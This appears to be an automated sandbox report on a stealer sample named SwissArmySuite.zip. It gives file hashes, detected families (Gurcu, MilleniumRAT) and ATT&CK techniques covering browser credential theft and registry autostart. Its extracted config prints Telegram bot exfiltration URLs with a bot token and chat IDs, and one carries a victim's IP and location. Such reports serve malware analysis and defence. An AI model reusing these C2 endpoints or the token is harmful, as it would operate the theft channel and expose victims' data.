General
-
Target
SwissArmySuite.zip
-
Size
33.6MB
-
Sample
241202-se4nssvjel
-
MD5
43a2c8d8d0b226bda140b1e4867b74db
-
SHA1
a041dcc61b5a2ef098f3c12dcc24b05d4b573ed4
-
SHA256
4a665905b9f38b14bdf6df4534d4be7e1f1f66e18c117fdf09bf3ae113e7f9ae
-
SHA512
4c2f1e48c599bef7923d6d923973a25e8569a31851b3ad07e4debc0a3f996142959a785d23ed7f55903c290bea573a6bf9d014231bf9bed72776838ef46ce5a9
-
SSDEEP
786432:/023Xy+8BYtbiDogGMhRNenIWUvCMIJQHdPBRfTSig78vflQ4p:/pC+gw6HNeIxvCRS9D7mAvy4p
Static task
static1
Behavioral task
behavioral1
Sample
SwissArmySuite/SwissArmySuite
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral2
Sample
SwissArmySuite/SwissArmySuite.exe
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
SwissArmySuite/SwissArmySuite.exe
Resource
win10v2004-20241007-en
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4590251468&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4594364141&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendMessage?chat_id=-4594364141
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/getUpdates?offset=-
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4594364141&caption=%F0%9F%93%B8Screenshot%20take
Targets
-
-
Target
SwissArmySuite/SwissArmySuite
-
Size
12.0MB
-
MD5
e76d4577e5b8c4fe7ca8afb031f68e2c
-
SHA1
05a644a46c2ac2a450a3472c2eac28b3040a42c9
-
SHA256
271447df3a48c399f489075425ae05cd69f21de5790ed53ed4c3d30b623adfd3
-
SHA512
50c429cada9823a8fcf3c14901bd80ff61dbecba10ceded85e03e9d4333ada9d40717fc18b5d38f858ce3d2a49d520d8b43390e56ec0e013fa5b9e9c7db658db
-
SSDEEP
98304:7tvaLvw3foPoyQoBDCFZeOQ5olEE+dCO3TQ6VwzbIlzoKcB4h2WdU+0Er5rM6uF:cDwwwjEC7OdExO3TdzsQ2GDr5ryF
Score1/10 -
-
-
Target
SwissArmySuite/SwissArmySuite.exe
-
Size
19.5MB
-
MD5
11d14c97869ea381661418d7f7ed24f3
-
SHA1
1ad45d4bafe7b62c61960d212fa61011a43c546b
-
SHA256
703bd75c721e362922484aed47f52a25e70e9e6555b01e569f460753e6b64dc8
-
SHA512
2b15c4c412e4f182a9c6329001f83d67f92317afa90c4d86bcffdf59f87e44d42ca82d74d880927397465bc3ae7d265a99485d03c824c081e71c7a6fc2f05adc
-
SSDEEP
393216:GB62IN4Eg5zDmMStlgQYrMUGBuaUrs6BlLN:GB6X4N5fmMHRu7Ug6BlR
-
Gurcu family
-
Milleniumrat family
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Loads dropped DLL
-
Adds Run key to start application
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1